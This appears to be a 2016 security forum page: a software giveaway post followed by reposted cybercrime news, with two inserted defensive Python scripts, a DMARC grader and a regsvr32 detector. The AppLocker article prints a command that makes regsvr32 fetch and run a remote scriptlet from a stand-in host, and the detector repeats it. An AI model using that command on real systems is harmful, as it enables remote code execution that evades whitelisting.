DAEMON Tools Lite 10 (10 Lifetime Licenses) |
Posted by: tarekma7 - 04-22-2016 , 11:29 PM - Forum: Expired Giveaways
- Replies (66)
Released: March 1, 2016
DAEMON Tools Lite 10 is well-known software used to create and mount images.
DAEMON Tools Lite 10 allows you to mount all known types of disc image files and emulates up to 4 DT + SCSI + HDD devices. It enables you to create images of your optical discs and access them via a well-organized catalog.
With the latest major version, the program includes not only the free basic features for virtual device emulation, but also a number of advanced tools to work with VHD, RAM disks, iSCSI Targets, bootable USB sticks and lots of others.
The free part of DAEMON Tools Lite 10 provides the following features:
- Ability to mount all popular types of images including VHD, VMDK and TrueCrypt files
- Creation of *.iso, *.mdx and *.mds/*.mdf image files
- Compression and protection of your custom virtual discs
- Emulation of up to 4 DT, SCSI or HDD devices
- Brand-new Images catalog filled automatically
Homepage:
https://www.daemon-tools.cc/products/dtLite
What's new:
- Add and adjust virtual drives
- Get short help guide on the first start
- Save folder structure for volatile RAM disks
- For Windows 7 and later only!
Bugs fixed:
For the full list of changes:
https://www.daemon-tools.cc/releasenotes/dtlite
License:
Lifetime updates (Minor and Major) for 3 PCs
No third-party offers
24/7 support
Additional features can be added to the license by purchase (get all at half price)
Giveaway Details:
Number of Licenses: 10
Validity of Licenses: Lifetime (with Minor and Major updates) / usable on 3 PCs
Duration of giveaway: 15 days
Giveaway ends: May 07, 2016
Rules:
1. Share this giveaway post to your Facebook, Twitter or Google+ and share the links along with your comment below.
2. Subscribe to our newsletter RSS FeedBurner and get all the latest giveaways and contests delivered to you by email.
3. Winners will be selected by using Random.org.
4. If you don't want to take part in this giveaway, please don't post a comment; it creates problems when we randomize winners.
5. Winners must contact me within 2 days after the giveaway ends to claim their win. I need the winner's name and email address.
FIN6 Group Stole Tens of Millions of Credit Card Records from PoS Systems |
Posted by: baziroll - 04-22-2016 , 10:48 PM - Forum: Security News
- No Replies
Yesterday, security researchers from FireEye and iSight Partner revealed a report detailing the previously unknown mode of operation of a criminal group named FIN6.
FireEye says the group surfaced in 2015 and focused only on the theft of financial information, mainly credit card data from organizations in the retail and hospitality sectors.
Researchers explain the group only targeted PoS (Point of Sale) systems and used two well-known malware families that aided their criminal efforts.
All FIN6 attacks started with email spam campaigns that distributed the Grabnew malware, also known as Vawtrack and Neverquest.
Grabnew is a credential-stealing backdoor with form-grabbing capabilities and the ability to inject code into specific Web pages. Grabnew collected login credentials for infected computers and PoS systems and then transmitted this information to the FIN6 group.
"FIN6 used Grabnew and Trinity malware"
The crooks then used this information, together with Grabnew's ability to download and install other malware, to deliver their second threat called Trinity, a malware family for PoS terminals.
Trinity collected vast amounts of data from infected systems, and at regular intervals, it would compress all data as a ZIP file, send it to an intermediary host, from where it was relayed to FIN6's C&C (command and control) servers.
The group would then take all this information and upload it to "card shops" hosted on the Dark Web, where other criminal groups would buy the information and carry out financial fraud operations.
Security researchers added that, in one singular card breach, FIN6 managed to steal data on over 20 million credit cards, which, when sold through its card shops, pocketed the group over $400 million (€355 million).
A visual presentation of FIN6's activities can be viewed in the YouTube video below, and for more details, Softpedia readers can download FireEye and iSight Partner's Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6 report.
source
Chinese National Sentenced to Death After Leaking 150,000 Classified Files |
Posted by: baziroll - 04-22-2016 , 10:43 PM - Forum: Security News
- No Replies
Huang Yu, 48, was sentenced to death after Chinese officials discovered he was selling classified documents to an unidentified foreign intelligence agency, Shanghai Daily reports, citing a China Central Television (CCTV) news broadcast.
Between 2002 and 2004, Huang worked as a computer technician for a governmental research institute in China’s Sichuan Province. In 2004, Huang was fired from this institute for poor performance.
Following his abrupt dismissal, Huang decided to contact a foreign intelligence agency via the Internet and offered to sell classified documents that he obtained from his former workplace and had copies of at home.
"Huang recruited his wife and brother-in-law"
Huang then met with foreign agents over 21 times and transmitted over 150,000 classified documents that contained information about a cipher system developed at the research institute he worked for, but also about China's Communist Party leadership and the country's military and financial operations.
Huang collaborated with the agency until 2011, and he received $10,000 (€8,850) as an initial fee and then a monthly salary of $5,000 (€4,400). During his partnership and up until being arrested, Huang made over $700,000 (€620,000).
At one point, after seeing his collection of stolen files deplete, Huang also enlisted his wife and brother-in-law to help exfiltrate new files. Huang's wife had a job at a similar research institute, while his brother-in-law was an employee at the same institute where Huang had worked in the past.
"It's unclear if Huang has been executed or not"
Authorities got suspicious of Huang following numerous trips outside China's borders to meet with the agents and after he amassed a huge wealth without being employed.
Huang was arrested in 2011, and no details about his trial have ever been released. CCTV said he was sentenced to death, but did not mention if the sentence was carried out.
Furthermore, Huang's wife also received a five-year prison sentence while his brother-in-law got three years in prison. Twenty-nine of Huang's former colleagues also received punishments, which CCTV had not elaborated on.
source
SpyEye Masterminds Get 15, 9 Years in Jail, Respectively |
Posted by: baziroll - 04-22-2016 , 10:42 PM - Forum: Security News
- No Replies
A judge sentenced two hackers involved in the creation, maintenance, and marketing of the SpyEye financial botnet to a combined sentence of 24 years in prison, the US Department of Justice has announced today.
Aleksandr Andreevich Panin, 27, from Russia, known online as Gribodemon and Harderman, received nine and a half years in prison, while his accomplice, Hamza Bendelladj, 27, from Algeria, known online as Bx1, got 15 years in jail.
"SpyEye's birth and beginnings"
SpyEye was a banking trojan developed in 2010 and advertised as a "Zeus Killer." You should know that Zeus was a similar banking trojan that existed prior to SpyEye's birth and that was the most famous and wide-reaching banking botnet when the latter appeared.
Panin was the main developer behind the SpyEye trojan, but according to the FBI, Bendelladj also helped once in a while develop new SpyEye components but more often aided Panin in advertising the botnet on underground hacking forums such as Darkode.
The FBI credits Bendelladj with creating SpyEye's Automated Transfer System (ATS), the backend panel that helps criminals transfer money from the victim's account, and "Web injects," the trojan's component that taps into browsers and steals the victim's banking portal login credentials. Bendelladj is also credited with creating the SpyEye component that removed the competing Zeus trojan from infected computers.
With the two collaborating, SpyEye grew in popularity, mainly due to an aggressive advertising campaign and thanks to a lower price than Zeus’.
"SpyEye merges with Zeus, and Bendelladj leaks their source code"
In November 2010, Panin and Evgeniy Bogachev, Zeus' creator, came to an agreement to merge the two botnets. Bogachev, known online as Slavik, decided to retire and handed over Zeus' source code to Panin.
Unknown to Panin, Bendelladj had other plans and eventually leaked Zeus' source code online, and later SpyEye's code. Authorities say that Bendelladj didn't always get along with Panin, which may explain why he took such actions.
Besides playing a key role in SpyEye's creation and distribution, Bendelladj received a bigger sentence because of his role in other cyber-criminal operations.
Bendelladj used data acquired via the SpyEye botnet to create the VCC.sc website, where he sold stolen credit card information to other cybercriminals.
"Authorities made three arrests related to SpyEye operations"
The first one to get caught was Bendelladj, who was arrested in Bangkok, Thailand, in January 2013 while traveling from Malaysia to Egypt. It was later discovered that Bendelladj collaborated with authorities, and his insider information helped the FBI shut down the Darkode hacking forum last summer.
US authorities arrested Panin a few months later, in July 2013, at Atlanta's airport, while the criminal was changing flights.
In May of 2014, James Bayliss, a British hacker, was also arrested and accused of collaborating with Panin on creating the ccgrabber SpyEye plugin, which was capable of searching and collecting credit card and CVV numbers from a victim's Internet (for submission) requests.
Bayliss' trial is still underway while Evgeniy Bogachev, Zeus' creator, was never caught and remains one of the FBI's most wanted cyber-criminals, with a $3 million (€2.65 million) reward for his capture.
"SpyEye botnet takedown and Bendelladj's impact on cyber-crime"
Since their arrest, authorities and cyber-security vendors such as Trend Micro, Microsoft, Dell, Flashpoint, PhishLabs, and Damballa have taken down most of the SpyEye botnets.
Authorities claim that SpyEye infected over 50 million computers and helped crooks steal over $1 billion (€885 million). At one point during the investigation, rumors surfaced that Bendelladj donated over $100 million (€88.5 million) from the SpyEye stolen money to Palestinian charities.
Bendelladj's impact in the cyber-crime world is much more than that, possibly in the realm of tens of billions of dollars. By releasing the source code of Zeus and SpyEye, Bendelladj provided other cyber-crime groups with a starter kit in creating their own banking trojans.
Nowadays, almost every month, there is a new banking trojan popping up that uses the old Zeus malware model or small bits of its code. Just yesterday, Proofpoint researchers discovered the Panda Banker trojan, the most recent version based on the old Zeus code. Previously, they found another similar banking trojan named Thanatos.
You could say that Bendelladj has singlehandedly made banking trojans a commodity on the criminal underground while previously these types of operations were only reserved for criminal groups possessing large amounts of cash to buy, rent, and operate such infrastructures.
Before getting arrested and following the release of SpyEye's source code online by his former partner Bendelladj, Panin was planning to release SpyEye 2.0.
source
Dutch Police Shuts Down Blackberry PGP-Based Mobile Network |
Posted by: baziroll - 04-22-2016 , 10:41 PM - Forum: Security News
- No Replies
Dutch law enforcement, in cooperation with government agencies from other countries, has forced Ennetcom, a Dutch company providing encryption communications for mobile devices, to shut down its operations, three days ago, on April 19.
Ennetcom bitterly informed its clients about the government's decision by means of a popup shown on its website. The popup's text reads:
“Tuesday, April 19th, 2016 revealed that judicial research is being done towards Ennetcom. There has been an international collaboration of various government agencies and Interpol in attempt to put our network down. Previously there have been attempts to put us down, amongst them the Dutch intelligence service, but they never succeeded (see Wikileaks). Regarding the current investigation, Ennetcom is forced to suspend all operations and services for the time being. Ennetcom regrets this course of events and insinuations towards Ennetcom. It should be clear that Ennetcom stands for freedom of privacy! Because of security and privacy reasons Ennetcom chooses to keep all systems offline.”
Following this announcement, the company's network was closed down, and clients weren't able to carry out any type of data transfers. Ennetcom had around 19,000 registered users.
Ennetcom accused of helping drug dealers
Ennetcom (Encrypted Network Communications) is a mobile network that relays all its traffic via BlackBerry Enterprise Servers (BES) using its PGP encryption system that the company calls Mobile Encryption Gateway. Additionally, customers also have to purchase specialized handsets to access the Ennetcom network.
The company claims that "it is impossible to intercept and decrypt any data that is sent from one handset to another." According to Dutch media, this is the reason the company's operations were suspended.
Dutch and international law enforcement agencies are saying that drug dealers are among Ennetcom's most devoted clients and have moved on to seize the company's servers.
Canadian police are rumored to be involved in the operation. Last week, evidence surfaced that Canada's Royal Canadian Mounted Police (RCMP) was in possession of a BlackBerry decryption master key that could unlock encrypted messages sent to BlackBerry devices. Most of Ennetcom's handset offering includes BlackBerry smartphones.
source
Unprotected Database Exposes Details of 93.4 Million Mexican Voters |
Posted by: baziroll - 04-22-2016 , 10:39 PM - Forum: Security News
- No Replies
The details of 93,424,710 Mexican voters were exposed online via an unprotected MongoDB database that had no admin password and was easily reachable via a public IP address.
MacKeeper security researcher Chris Vickery discovered the database on April 14, running on an Amazon AWS cloud server. Soon after he identified the data and realized what he was looking at, the researcher contacted the US State Department and later the State Department’s Office of Mexican Affairs.
"Database was secured eight days after being discovered"
After receiving no response, the researcher then contacted the US Secret Service, Department of Homeland Security, US-CERT, Amazon, and the Mexican embassy in the US.
Eight days later, Mexico's Instituto Federal Electoral (Federal Electoral Institute) (IFE) reached out to Mr. Vickery, thanked him for his efforts, and also informed him they secured the database.
IFE representatives told DataBreaches.net that the IP on which the server was running was not one of their own, that the database's total statistics did not match their own numbers, and that they'd start an investigation to see how the data ended up on a US-based Amazon server.
Mexican law prohibits companies from moving sensitive data of Mexican citizens across the border. The maximum penalty is six years in prison.
"Database didn't contain financial or biometrics information"
According to Vickery and DataBreaches.net, the database contained Mexican citizens' names, full addresses, dates of birth, mother's and father's name, current occupation, and their voter ID.
Vickery is the security researcher who also discovered the details of 191,337,174 US voters through another misconfigured MongoDB database.
Before this incident, the details of 55 million Filipinos were leaked after Anonymous and LulzSec Philippines hackers breached the COMELEC database at the start of the month. Prior to that incident, the details for 50 million Turks were also leaked online.
source
Prosecutors Accuse Bitcoin Trader of Laundering Money for Ransomware Operators |
Posted by: baziroll - 04-22-2016 , 10:37 PM - Forum: Security News
- No Replies
US authorities have arrested new suspects in a lingering case that is linked to data breaches at some of the US' biggest financial firms, but also a money laundering scheme that involved a Bitcoin exchange website secretly and illegally operating through a New Jersey credit union.
Legal proceedings started in July 2015, when authorities arrested four suspects in relation to data breaches at twelve international companies, including nine financial institutions, between 2007 and 2014.
Authorities filed official charges against three Israeli citizens in November 2015, accusing them of stealing data from over 100 million users. JPMorgan Chase, Scottrade, The Wall Street Journal, E*Trade Financial Corp, TD Ameritrade, News Corp, and seven other companies suffered data breaches.
Prosecutors charged a fourth man, Anthony Murgio, 31, of Florida, but at that time, authorities provided no details except an accusation of running illegal Bitcoin exchanges.
"Murgio and Lebedev operated the Coin.mx Bitcoin trading website"
More details were provided in subsequent charges in March 2016. Murgio and his partner, Yuri Lebedev, were accused of running the Bitcoin exchange portal Coin.mx by disguising Bitcoin-dollar transactions via the Helping Other People Excel (HOPE) Federal Credit Union in Jackson, New Jersey.
The credit union's former president, Trevon Gross, 46, was also charged with taking a bribe to facilitate Murgio's election on the credit union's board of directors.
According to a recent report from the SunSentinel, Michael Murgio, 65, of Florida, Anthony Murgio's father, was also arrested and charged with federal bribery for his involvement in the incident mentioned above.
Additionally, the prosecution also piled a money laundering charge on top of the previous indictments for Murgio and Lebedev, Coin.mx's operators.
Prosecutors are accusing the two of knowing that their service was used to convert dollars to Bitcoin, which would then be used by victims of ransomware infections to pay ransoms.
US laws say that Murgio and Lebedev should have informed authorities that such actions were happening through their service, instead of remaining silent and indirectly complicit in the crime.
Of course, the technical details of Bitcoin transactions wouldn't have helped US authorities track down ransomware operators anyway, but this was just another opportunity to throw an extra charge on an already bulky criminal case.
source
Law Enforcement, Government Agencies See Phishing as Main Cyber Risk |
Posted by: baziroll - 04-22-2016 , 10:35 PM - Forum: Security News
- No Replies
In a meeting held in New York, representatives of law enforcement and governments from the US and the UK met to agree on a joint plan to tackle cyber threats, and their top priority for the foreseeable future will be phishing attacks.
The Global Cyber Alliance (GCA) was founded at the start of January this year, and on March 19 held its first Strategic Advisory Committee (SAC) meeting.
Here, founding members that included representatives from the City of London Police, The New York County District Attorney's Office and the Center for Internet Security agreed on a list of today's top cyber risks, in order to develop joint strategies to counter their effects.
"Phishing ranked top cyber threat, DDoS attacks ranked fourth"
Based on their expertise, these three organizations ranked phishing attacks as today's greatest cyber threat, followed in order by risks arising from weak identity and authentication mechanisms, risks arising from vulnerable and compromised websites, and Distributed Denial of Service (DDoS) attacks.
Personally, we see vulnerable and compromised websites as a more dangerous threat, but we must also agree to disagree.
Just recently we've seen many compromised websites (frontends, backends, exposed network equipment) allowing attackers to gain a foothold on infected systems, from where attacks can then escalate. Phineas Fisher, the famous hacker that breached Hacking Team's servers last year didn't use phishing for his attacks.
Nevertheless, our view on this topic may be skewed by our technical prowess in terms of cyber-security practices. Phishing, you see, while ineffective against a security expert, is quite effective against most regular people.
While companies may benefit from a security team to address their website security, you at home may not benefit from anti-phishing training, and here is where authorities need to stand in and help.
"GCA: DMARC usage needs to increase"
In order to stop, or at least cut down the number of phishing attacks, the GCA plans to promote the usage of the DMARC protocol that makes it harder to spoof original domains. Further plans include the GCA promoting the usage of secure DNS practices, which will also impede basic spear-phishing attacks.
Law enforcement and government agencies are right to be worried about spear-phishing, as Rohyt Belani, co-founder and CEO of PhishMe, told Softpedia.
"Recent research shows that employee-targeted spear-phishing campaigns spiked a staggering 55 percent just last year in addition to the FBI’s recent warnings that phishing-related wire fraud scams have cheated businesses out of $2.3 billion since 2013.
"Those of us in the security industry realize these upward trends signify that attackers will continue targeting employees as a primary exploitation point as long as they’re experiencing continued success.
"Seeing law enforcement agencies and municipal governments working closely together to address and combat serious threats is encouraging. The recent announcement from the Alliance brings additional visibility to the dangers of phishing and reinforces that this attack vector is a top cybercrime concern.
"Outside technical measures, employees need better anti-phishing training as well"
Mr. Belani also warns companies not to rely solely on the technical side and spend time training their employees against common phishing practices.
"Although various technology layers are essential for a strong defense-in-depth strategy, security professionals must remember that empowering employees as a last line of defense is key in defeating spear-phishing threats," Mr. Belani also told Softpedia.
"As research proves, employees remain a primary target for infiltrating organizations since malicious emails are consistently passing through weak perimeter defenses and landing in staff inboxes. By effectively conditioning behavior and operationalizing human intelligence, organizations will be better equipped to identify, prioritize and respond to phishing and other key threats before attack payloads are delivered.
"Failure to embrace employees and human-generated intelligence as viable defensive layers in an organization’s security posture is akin to not having a line of defenders standing between the soccer goal and the opposition when the latter is taking a free kick."
source
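The article says the GCA wants wider DMARC adoption because DMARC makes domain spoofing harder. How much harder depends on what the domain owner actually publishes: a record with p=none only asks receivers to report, while p=quarantine or p=reject tells them to act on mail that fails SPF/DKIM alignment. The following script is an added example, not code from the article or from the GCA, that parses a DMARC TXT record (tag syntax per RFC 7489) and grades how much protection it provides. The sample records are constructed and the domain names are placeholders.

```python
"""Parse a DMARC TXT record and grade its anti-spoofing strength (added example)."""

# Constructed sample records; example.invalid is a placeholder, not a real domain.
SAMPLES = {
    "monitor-only": "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.invalid",
    "enforcing": "v=DMARC1; p=reject; sp=reject; adkim=s; aspf=s; "
                 "rua=mailto:dmarc-reports@example.invalid; pct=100",
    "partial": "v=DMARC1; p=quarantine; pct=10",
    "broken": "p=reject; v=DMARC1",   # version tag must come first (RFC 7489 s6.3)
}

VALID_POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        name, value = part.split("=", 1)
        tags[name.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str):
    """Return (grade, issues) where grade is one of
    'invalid', 'monitor', 'partial', 'enforcing'."""
    try:
        tags = parse_dmarc(record)
    except ValueError as exc:
        return "invalid", [str(exc)]

    # The version tag is mandatory and must be the first tag in the record.
    first = record.split(";", 1)[0].replace(" ", "").lower()
    if first != "v=dmarc1":
        return "invalid", ["record must begin with v=DMARC1 (RFC 7489 s6.3)"]

    policy = tags.get("p")
    if policy not in VALID_POLICIES:
        return "invalid", ["missing or unknown p= tag"]

    issues = []
    try:
        pct = int(tags.get("pct", "100"))   # pct defaults to 100 when absent
    except ValueError:
        return "invalid", [f"pct must be an integer, got {tags['pct']!r}"]

    if "rua" not in tags:
        issues.append("no rua= address: aggregate reports (and spoofing attempts) go unseen")
    # sp defaults to p; an explicit weaker subdomain policy leaves subdomains spoofable.
    sub_policy = tags.get("sp", policy)
    if VALID_POLICIES.index(sub_policy) < VALID_POLICIES.index(policy):
        issues.append(f"sp={sub_policy} is weaker than p={policy}; subdomains stay unprotected")

    if policy == "none":
        issues.append("p=none only monitors; mail failing DMARC is still delivered")
        return "monitor", issues
    if pct < 100:
        issues.append(f"pct={pct}: policy applies to only {pct}% of failing mail")
        return "partial", issues
    return "enforcing", issues


if __name__ == "__main__":
    for label, rec in SAMPLES.items():
        grade, issues = assess_dmarc(rec)
        print(f"{label:13s} -> {grade}")
        for issue in issues:
            print(f"    - {issue}")
```

In practice the record is fetched as the TXT record of `_dmarc.<domain>`; feeding that string to `assess_dmarc` gives the same grading. Note that DMARC only constrains mail that claims the protected domain in its From: header, so it does nothing against phishing sent from look-alike domains the attacker registers themselves.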
Windows AppLocker Bypass Allows Attackers to Register DLLs Off the Internet |
Posted by: baziroll - 04-22-2016 , 10:34 PM - Forum: Security News
- No Replies
Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.
AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or groups of users are allowed to access and run files on a per-file basis.
Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.
Attacks are impossible to detect
According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.
The attacker won't need admin privileges; Regsvr32 is proxy aware, can work with TLS content, follows redirects, and, above all, is signed by a Microsoft-issued certificate, making all commands look like normal Windows background activity.
Below are the standard Regsvr32 syntax and a version of a malicious command:
regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Regsvr32 feature is not documented
"It's not well documented that regsvr32.exe can accept a url for a script," Smith also noted. "In order to trigger this bypass, place the code block, either VB or JS inside the element."
For further tests, the researcher has also published four proof-of-concept scripts on GitHub that sysadmins can load via Regsvr32 and open a backdoor or a reverse shell over HTTP.
In theory, these kinds of exploits would allow a hacker access to register DLLs and then execute malicious code on the compromised machines, even with admin privileges.
source
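The article quotes the command shape involved (regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll) and says the activity blends in because the binary is Microsoft-signed. From a detection standpoint, the command line itself is the thing that does not blend in: a legitimate regsvr32 invocation names a local DLL, while this one passes an HTTP(S) URL to /i: and names scrobj.dll. The script below is an added example, not code from the article or from the researcher, that runs that check over process-creation records of the kind an EDR or Sysmon event ID 1 would export. The sample events and hostnames are constructed, not real telemetry.

```python
"""Flag regsvr32 command lines that fetch a scriptlet from a URL (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events: (image path, command line).
# Modelled on Sysmon event 1 / EDR fields; not taken from any real host.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s C:\\Program Files\\Vendor\\plugin.dll"),            # normal install
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"),         # shape from the article
    ("C:\\Windows\\SysWOW64\\regsvr32.exe",
     "regsvr32 /s /n /i:https://example.invalid/x.sct scrobj.dll"),     # 32-bit copy, HTTPS
    ("C:\\Windows\\System32\\regsvr32.exe",
     "regsvr32 /u /s C:\\Windows\\System32\\msxml3.dll"),               # normal unregister
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c dir"),                   # unrelated process
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    reasons: list = field(default_factory=list)


def analyse_regsvr32(image: str, command_line: str):
    """Return a Finding if the command line shows the remote-scriptlet pattern,
    otherwise None. Matching is case-insensitive, since Windows is."""
    if not image.lower().endswith("regsvr32.exe"):
        return None
    tokens = command_line.split()
    lowered = [t.lower() for t in tokens]
    # Switch names without their ':' argument, e.g. '/i:http://...' -> '/i'
    switches = {t.split(":", 1)[0] for t in lowered if t.startswith("/")}
    install_args = [t[3:] for t in tokens if t.lower().startswith("/i:")]

    reasons = []
    if any(URL_RE.match(arg) for arg in install_args):
        reasons.append("remote URL passed to /i: (scriptlet fetched over HTTP/HTTPS)")
    if any(t.endswith("scrobj.dll") for t in lowered):
        reasons.append("scrobj.dll named as the DLL (Windows Script Component host)")
    if "/n" in switches and install_args:
        reasons.append("/n with /i: skips DllRegisterServer; only DllInstall runs")
    return Finding(command_line, reasons) if reasons else None


def scan_events(events):
    """Run the check over (image, command_line) pairs and collect findings."""
    findings = []
    for image, cmdline in events:
        hit = analyse_regsvr32(image, cmdline)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print("SUSPICIOUS:", f.command_line)
        for r in f.reasons:
            print("   -", r)
```

A local path after /i: is legitimate (installers use it), which is why the URL check, not the mere presence of /i:, carries the weight here; scrobj.dll on its own is rare enough in normal regsvr32 use that it is worth an alert even without a URL. Pairing this with network telemetry (regsvr32.exe making an outbound HTTP connection) gives a second, independent signal.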
Bug Hunter Hacks Facebook, Finds Someone Else's Backdoor Script |
Posted by: baziroll - 04-22-2016 , 10:33 PM - Forum: Security News
- No Replies
While trying to find bugs in Facebook's services, a security researcher accidentally stumbled over a hacker's backdoor script that was logging Facebook employee credentials for some of the company's backend applications.
Orange Tsai, a consultant for DevCore, also spends a lot of his free time helping big name companies fix vulnerabilities via their bug bounty programs. At the end of February, Tsai decided to give Facebook's bug bounty program another try and started mapping some of the company's backend services for possible servers he might hack.
"Researcher hacks Facebook's internal file sharing application"
His search led him to the files.fb.com domain, which is an online file transfer and file hosting service, running on Accellion’s Secure File Transfer (FTA) application.
After identifying the application's type and version, the researcher went to work and explored its source code, discovering three cross-site scripting (XSS) flaws, two local privilege escalation issues, a known-secret-key issue that led to remote code execution, and a pre-auth SQL injection that also led to remote code execution.
The researcher used the SQL injection flaw he discovered in the FTA application to access Facebook's server and was rewarded with complete control over the machine.
With his goal reached, the researcher then started collecting the necessary information to submit a bug report to Facebook's staff. While looking at one of the server's logs, Tsai discovered a lot of suspicious error messages.
"Somebody already hacked the server and not part of the bug bounty program"
He tracked these messages down to a webshell which, he was sure (and it was quite obvious), no Facebook employee had ever uploaded. Inspecting the webshell's source code, Tsai found evidence of a server-side keylogger which was intercepting login operations and storing Facebook employee access credentials in a local log file.
The researcher then looked at other log files that showed how the hacker came back at various intervals to collect the logged data, map the local network, and attempt to steal SSL private keys.
Details revealed two separate periods when the hacker was active, one in July 2015, and then one in mid-September 2015.
Tsai filed a bug report with Facebook about the incident; the company started an in-house forensics investigation and rewarded the researcher with $10,000 (€8,850) for his efforts.
UPDATE: In a statement on Hacker News, Facebook's Reginaldo Silva said the webshell discovered on its servers was left there by another bug hunter, also enrolled in the company's bug bounty program.
source
Anonymous Hackers Change OpKillingBay Tactics, Campaign Goes Global |
Posted by: baziroll - 04-22-2016 , 10:31 PM - Forum: Security News
- No Replies
Yesterday, Akamai SIRT (Security Intelligence Response Team) issued a new threat advisory warning companies that one of Anonymous' most famous hacktivism campaigns has now changed its MO, with DDoS attacks carried out all over the globe, not just in Japan.
OpKillingBay started as early as 2013 and was a collective effort from Anonymous hackers who set out to attack and shut down websites belonging to the Japanese government because of their intense and gruesome whale and dolphin hunting operations.
The Anonymous operation continued non-stop all these years, but the hackers rarely targeted sites outside Japan's government and local municipalities.
Two rare exceptions occurred in November 2015, when the group shut down five government websites in Iceland for participating in whale hunting operations, and then in January, when the hackers attacked Nissan just because it was a big Japanese corporation and didn't use its influence to discourage whale hunting in the country.
"The Iceland and Nissan attacks were eye-openers"
Akamai researchers say that these exceptions are now the norm in DDoS attacks marked with the OpKillingBay tag. Hacktivists are now attacking not only the Japanese government for continuing to run somewhat illegal whale hunting operations but also the governments and companies from other countries such as Iceland, Denmark, and the Faroe Islands.
Furthermore, attacks have also been recorded against companies that have nothing to do with official whale hunting policies but are still targeted because they don't do anything about it.
Akamai says that, after the Nissan DDoS attack in January, the company saw similar attacks against a different automaker on February 4.
Besides the automotive industry, attacks were also carried out against companies activating in the retail business, telecommunications, transportation, sports, travel, theme parks, seafood, and financial sectors.
Seeing that Japanese officials have largely ignored the past DDoS incidents, the hacktivists seem poised to make as much noise as possible for their campaign by targeting everything that has remotely anything to do with whale and dolphin hunting.
source
Anonymous Member Arrested for the COMELEC Hack |
Posted by: baziroll - 04-22-2016 , 10:30 PM - Forum: Security News
- No Replies
Philippine authorities announced they arrested Paul Biteng, a 23-year-old college student, for his role in the hacking of the Philippines Commission on Elections (COMELEC) website.
The COMELEC hack took place on March 27, when members of the Anonymous Philippines group defaced the website, leaving a message behind warning that some corrupt government officials may try to abuse PCOS (Precinct Count Optical Scan) devices to manipulate votes in the upcoming Presidential election.
A few days later, members of the LulzSec Philippines hacking crew breached the same website, but instead of leaving another message on its frontpage, these hackers opted to steal all the Filipino voter records and dump them online.
"It took three weeks for authorities to track down the hacker"
Following a three-week investigation, the Philippine National Bureau of Investigation (NBI) announced it tracked down and arrested Biteng on Wednesday night, April 20, in Manila.
Officials say he's a member of the Anonymous group and that they're still looking for two other suspects who aided Biteng in defacing the website. Investigators didn't provide information to reveal if these two collaborators are members of Anonymous or LulzSec.
According to the NBI, besides the COMELEC website, Biteng has defaced 25 other government sites. Among hacked websites, officials enumerated the sites of the Civil Service Commission, the Dipolog city government, and PAGASA (Philippine Atmospheric, Geophysical and Astronomical Services Administration).
Investigators say that his prolific activity has helped them track him down, the hacker leaving many clues that tied him to the COMELEC hack and revealed his true identity.
"COMELEC data was briefly available online as a search-through website"
Two days ago, data from the COMELEC hack surfaced online on the wehaveyourdata.com website which allowed users to search the private details of any Filipino voter. Authorities have taken down the website in the meantime.
Below are videos from the press conference held by Philippine officials and electoral authorities.
source

Number of DDoS Bots That Can Bypass Mitigation Tools Rises to 36 Percent
Posted by: baziroll - 04-22-2016, 10:28 PM - Forum: Security News - No Replies

During the first three months of the year, DDoS protection firm Imperva observed a series of interesting trends regarding the DDoS landscape. According to the company's latest quarterly report, both network layer and application layer attacks grew in size and sophistication.
One of the rising trends is for Mpps network layer DDoS floods. Mpps stands for "Millions of packets per second" and refers to attacks targeting networking equipment by sending massive amounts of packets, not necessarily enough to clog up the company's bandwidth, but sufficient to overwhelm and crash networking equipment such as switches and routers.
"Network layer multi-packet attacks may be the next hot trend"
Imperva experts say they mitigated, on average, a 50+ Mpps DDoS attack every four days and an 80+ Mpps attack every eight days.
"We estimate that high Mpps attacks are being used as an attempt to circumvent current-gen DDoS mitigation solutions," Igal Zeifman, senior inbound marketing manager for Incapsula explained.
"By now, the majority of mitigation services and appliances are highly effective in dealing with high Gbps assaults. However, [...] many of the same solutions are not as capable of dealing with high Mpps scenarios, as they weren't designed with high packet processing rates in mind."
Another trend observed in network-level DDoS attacks includes the growth of multi-vector attacks. Imperva says that 33.9 percent of all the DDoS attacks it detected in Q1 2016 were multi-vector. A previous report by Neustar for Q4 2015 had this number at 17 percent.
"Application layer attacks are getting smarter"
On the other hand, for application-level attacks, Imperva says that it saw a rise both in the size of these attacks and their sophistication.
At the start of the month, Imperva reported a new record for Layer 7 DDoS attacks, set by the Nitol botnet.
Looking back over the entire quarter, besides this size increase, Imperva also noticed another trend. Botnet operators are beginning to deploy smarter bots (malware that infects computers to launch DDoS attacks).
In the first three months of the year, Imperva saw bots that could accept and hold cookies, and bots that could parse JavaScript, in 36.6 percent of all DDoS traffic. The same figure was only 6.1 percent in Q4 2015.
